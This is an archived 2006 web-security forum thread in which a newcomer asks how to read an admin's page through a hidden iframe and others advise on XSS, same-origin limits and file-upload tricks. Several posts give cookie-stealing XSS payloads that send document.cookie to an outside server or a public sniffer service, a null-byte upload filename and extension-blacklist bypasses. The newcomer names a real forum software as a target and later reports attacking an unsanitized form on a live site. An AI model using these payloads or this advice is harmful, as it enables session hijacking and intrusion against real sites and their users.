Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For Session, fixations, hijacking, lockout, replay, session riding etc.... 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
New to CSRF, have an idea
Posted by: hasse
Date: December 12, 2006 06:25PM

Hello! I'm pretty new to this CSRF-technique, but it looks like it has much potential. I just had an idea and I was just wondering if it's possible to do what I want.

Basically I create a site with an iframe pointing to a page I can't access, however an admin on that site can access the page. So I trick him to come to my page, the iframe loads the page I can't see, the iframe's 0x0 pixels large. Now can I somehow extract the code or some information from that iframe from the page the iframe is created on (to basically save what my victim has loaded in the iframe)? (If the explanation's unclear please ask.)

This might not be possible at all but like I said I'm new to this. Either way I'd really appreciate a reply. :)

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 12, 2006 10:01PM

Yes it's possible hasse.

But it would require one of the following:

* an XSS hole
* if you can upload an image, trick it into executing a serversided script.
* nullbyte exploit like: remote_image.jpg%00.php

If one of this is possible, you're on your way.



Edited 1 time(s). Last edit at 12/12/2006 10:01PM by jungsonn.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 12, 2006 10:38PM

jungsonn Wrote:
-------------------------------------------------------
> Yes it's possible hasse.
>
> But it would require one of the following:
>
> * an XSS hole
> * if you can upload an image, trick it into
> executing a serversided script.
> * nullbyte exploit like: remote_image.jpg%00.php
>
> If one of this is possible, you're on your way.


Ah, I see. I just thought that there'd be an easy way to "read" the iframe from it's parent page. What if I do it with regular frames? Or just in general.

Say there's a section of a page only moderators can access. If I know the address to that page and I can trick a moderator to visit my specially prepared site while he's logged in, can I somehow use his rights to read the page and save it for me?

I think no known holes of the types you mention exists for the site(s) I got this idea from.



Edited 3 time(s). Last edit at 12/12/2006 10:41PM by hasse.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: maluc
Date: December 12, 2006 11:07PM

Could probably find a hole, if the website is big enough. But you can only read contents in iframes if it's on the same domain as the page you opened it with. Can google/wiki "Same Origin Policy" for more info. Thus you have to be able to run javascript of your own, on the same domain as the target admin page..

However, if your admin uses IE you can read the page using the mhtml bug. Not too many admins use IE, so finding an XSS hole is usually the best bet.

-maluc

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 01:52AM

maluc Wrote:
-------------------------------------------------------
> Could probably find a hole, if the website is big
> enough. But you can only read contents in iframes
> if it's on the same domain as the page you opened
> it with. Can google/wiki "Same Origin Policy" for
> more info. Thus you have to be able to run
> javascript of your own, on the same domain as the
> target admin page..
>
> However, if your admin uses IE you can read the
> page using the mhtml bug. Not too many admins use
> IE, so finding an XSS hole is usually the best
> bet.
>
> -maluc

Ok, I see. So it's made that way for security reasons, sounds pretty smart. Of course there might be an XSS-hole but finding one in the latest Vbulletin probably isn't easy. But this is just a learning experience mostly I'm not dying to try it on some site.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: maluc
Date: December 13, 2006 02:12AM

if i'm not mistaken.. i thought i remembered seeing one in Vbulletin last week at securityfocus.. *goes to check before posting*

ah, it's been two weeks .. and ew to their imageless site re-design. http://www.securityfocus.com/bid/21157 it affects up to version 3.6.3 (and maybe not below 3.6)

-maluc

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 02:41AM

maluc Wrote:
-------------------------------------------------------
> if i'm not mistaken.. i thought i remembered
> seeing one in Vbulletin last week at
> securityfocus.. *goes to check before posting*
>
> ah, it's been two weeks .. and ew to their
> imageless site re-design.
> http://www.securityfocus.com/bid/21157 it affects
> up to version 3.6.3 (and maybe not below 3.6)
>
> -maluc

That looks good. I'll definitely look into that. :)



Edited 1 time(s). Last edit at 12/13/2006 02:41AM by hasse.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 13, 2006 06:27AM

Somewhere here on the board there is also an idea which had todo with an remote image (or avatar) which was forced to execute on the remote server as an .php file which could log cookies if i can remember on a PHP forum board, had todo with apache mod_rewrite, which is an interesting issue.

but then the admin has to look at your picture you inserted into your forum profile for instance. If he does the cookie will be retieved, cause the image was "getted" as an php file. and you can find it back in your server logs.

Try to look it up, it's in here somewhere under CSRF

Anyway this is also possible.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: WhiteAcid
Date: December 13, 2006 07:31AM

The thread you're talking about is http://sla.ckers.org/forum/read.php?4,260

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 13, 2006 02:28PM

WhiteAcid Wrote:
-------------------------------------------------------
> The thread you're talking about is
> http://sla.ckers.org/forum/read.php?4,260


Is that the thread? It doesn't seem to have to do anything with cookies.



Edited 3 time(s). Last edit at 12/13/2006 02:36PM by hasse.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 13, 2006 08:40PM

Yeah you are right, i thought it was in that thread also,
but it seems it's a new idea. 0_0

My idea was:

Using apache mod_rewrite a image to a php file.

then you link an image like:
<img src="site.com/image_bla'+document.cookie+'.jpg'" width=1 height=1>

In the server logs you "should" be able to see the getted image with the cookie embedded into the image file.

Don't know if it works, it was an idea.

EDIT: come to think about, the mod_rewrite isn't needed actually.
The image URI should be enough, cau in your server logs you should be able to see the getted image + cookie.

Can anyone confirm this?



Edited 1 time(s). Last edit at 12/13/2006 08:45PM by jungsonn.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 09:15AM

jungsonn Wrote:
-------------------------------------------------------
> Yeah you are right, i thought it was in that
> thread also,
> but it seems it's a new idea. 0_0
>
> My idea was:
>
> Using apache mod_rewrite a image to a php file.
>
> then you link an image like:
>
>
> In the server logs you "should" be able to see the
> getted image with the cookie embedded into the
> image file.
>
> Don't know if it works, it was an idea.
>
> EDIT: come to think about, the mod_rewrite isn't
> needed actually.
> The image URI should be enough, cau in your server
> logs you should be able to see the getted image +
> cookie.
>
> Can anyone confirm this?


You mean with JavaScript?
Like
<script>document.write('<img src="site.com/image_bla"'+document.cookie+'.jpg width=1 height=1>');</script>


The way I know of is to do:
<script>document.write('<img src="http://server.com/image.jpg?'+document.cookie+'">');</script>
For example this site:
http://antichat.ru
has a system for that anyone can use.

You just add this image with javascript:
http://antichat.ru/cgi-bin/s.jpg
and the cookies afterwards, like:

http://antichat.ru/cgi-bin/s.jpg?password=ad213bcde32
and then check the logs at
http://antichat.ru/sniff/log.php



Edited 3 time(s). Last edit at 12/14/2006 09:17AM by hasse.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 14, 2006 12:18PM

Not exactly, what i thought of was this:

RewriteEngine on
RewriteRule ^image\.jpg$ image.html [R]

I'm still busy with these ideas.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 04:49PM

jungsonn Wrote:
-------------------------------------------------------
> Not exactly, what i thought of was this:
>
> RewriteEngine on
> RewriteRule ^image\.jpg$ image.html
>
> I'm still busy with these ideas.


Ok, sounds good. :)

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 14, 2006 05:58PM

I can confirm that that does work Jungsonn... I have done similar things with other websites in the future (outputting dynamic images actually, but same idea). But the cookie part only works if you are on the same domain. So it's not really CSRF, but session riding and you have to have control over the server. So it's not 100% practical.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 14, 2006 07:10PM

rsnake Wrote:
-------------------------------------------------------
> I can confirm that that does work Jungsonn... I
> have done similar things with other websites in
> the future (outputting dynamic images actually,
> but same idea). But the cookie part only works if
> you are on the same domain. So it's not really
> CSRF, but session riding and you have to have
> control over the server. So it's not 100%
> practical.


I have to admit that I don't exactly get what he's trying to do, could you (or Jungsonn) maybe elaborate on that?

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 15, 2006 12:18AM

Yeah well i wasn't paying much attention to the thread :) so i got a little mashed up in my head and started ranting :) So sorry for that.

But, ok the Apache thingy would work to force the server to interpet an image to a php file. Could come to use in some area's. The cookie idea wasn't practical and as RSnake mentioned this is limited to the same origin policy (i forget that once in a while while dreaming of exploits) Alas, but i had another idea which could work on some crazy manner. I tryed to do it with PHP, the main idea that i had.
But that would require some XHR's todo the job. Cause you can XSS a site to force it to include a .js file as you know, in which you can initiate an XHR request to a PHP file which would log as much as you could dream of.

The other idea that i had was to bypass the filters (usually weak one's) to trick the script to accept your submitted "image" As seen with the NullByte injection you should be able to upload PHP files to the site your're on. (If they have a upload function somewhere) like: C:\folder\image.jpg%00.php

If you could do it, in the PHP file you can do everything that you want.

So to elaborate on it, the idea was to rewrite the image to a php file to trick it to execute the php file when viewing the image. I haven't test this, so it could be sooo wrong and stupid. Still, there reamin other options. If the site allows XSS then there is apretty good chance that the rest isn't filtered also on the site, which could possibly exploited to trick the server to remotely include a PHP file. (you know them include exploit)

So all this is a bunch of loose talk, and not really an CSRF issue.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 15, 2006 10:15AM

> So all this is a bunch of loose talk, and not
> really an CSRF issue.


Well it sounds interesting nonetheless. :)

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: maluc
Date: December 15, 2006 12:43PM

the %00.php could work, if they use a file upload rather than direct linking. Web servers, atleast Apache, doesn't attempt any file recognition by it's contents only the file extension. So if they only whitelist *.jpg/*.gif/*.png you're mostly outta luck. But, if there's some file upload that tries to blacklist *.php/*.pl/*.cgi/*.exe .. you can always try PHP's other extensions like .php5 .php4 .php3 or .htaccess perhaps

As for all the Apache stuff, i'm not sure where you plan to use that. If you have .htaccess/.conf write access on the target website, you already control it -.-

As for direct linking to remote images.. unless they open their image linking with <iframe> instead of <img> tags.. you're not gunna be able to do anything useful. I guess you could log visitors IP, User Agent, and OS fingerprintig -_-

And XH requests ('XHR requests' is redundant ^^) can only request files on the same subdomain (test.com != www.test.com != evil.com) and using the same protocol (http != https != ftp) as the current page requesting it. So you're gunna have to use an iframe/img/script/etc tag to call evil.com/log.php

-maluc

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 15, 2006 03:46PM

Yep, but the fun of nullbyte injection is that it breaks the filter which is trying to filter it :) It would be better to build your custom php shell todo these kind of attacks, then you have much more room to play then in your little browser which is limited. I've found nummerous cases where the nullbyte did break the filter (they had filtering) but it threw back errors and then it isn't usefull either. Somehow i do think of combining several different attacks, think about a simultaneous SQL injection attack and an XSS exploit for parsing the SQL output. Still have to figure out how, but with a custom shell this would lead to very dangerous situations.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 19, 2006 02:21PM

Well I have been testing and playing around with CSRF and man this CSRF stuff is really great, and powerful! I just found a site that had a form, when I posted certain data in there I got an unsanitized error message, so the special data + an XSS-attack and an external site created to POST that and you're set.



Edited 2 time(s). Last edit at 12/19/2006 02:23PM by hasse.

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 19, 2006 03:08PM

Yup, CSRF is one of the largely overlooked issues on the Internet today. No one really thinks about it.

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 20, 2006 12:04AM

rsnake Wrote:
-------------------------------------------------------
> Yup, CSRF is one of the largely overlooked issues
> on the Internet today. No one really thinks about
> it.


Yeah it's like an early christmas present to me. :)

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: rsnake
Date: December 20, 2006 10:33AM

Hahah... well Merry Christmas in that case!

- RSnake
Gotta love it. http://ha.ckers.org

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: jungsonn
Date: December 20, 2006 11:56AM

2 soon... 2 soon...

Options: ReplyQuote
Re: New to CSRF, have an idea
Posted by: hasse
Date: December 20, 2006 12:29PM

rsnake Wrote:
-------------------------------------------------------
> Hahah... well Merry Christmas in that case!

Thanks! Merry christmas (or the equivalent) to everyone on this forum!

Options: ReplyQuote


Sorry, only registered users may post in this forum.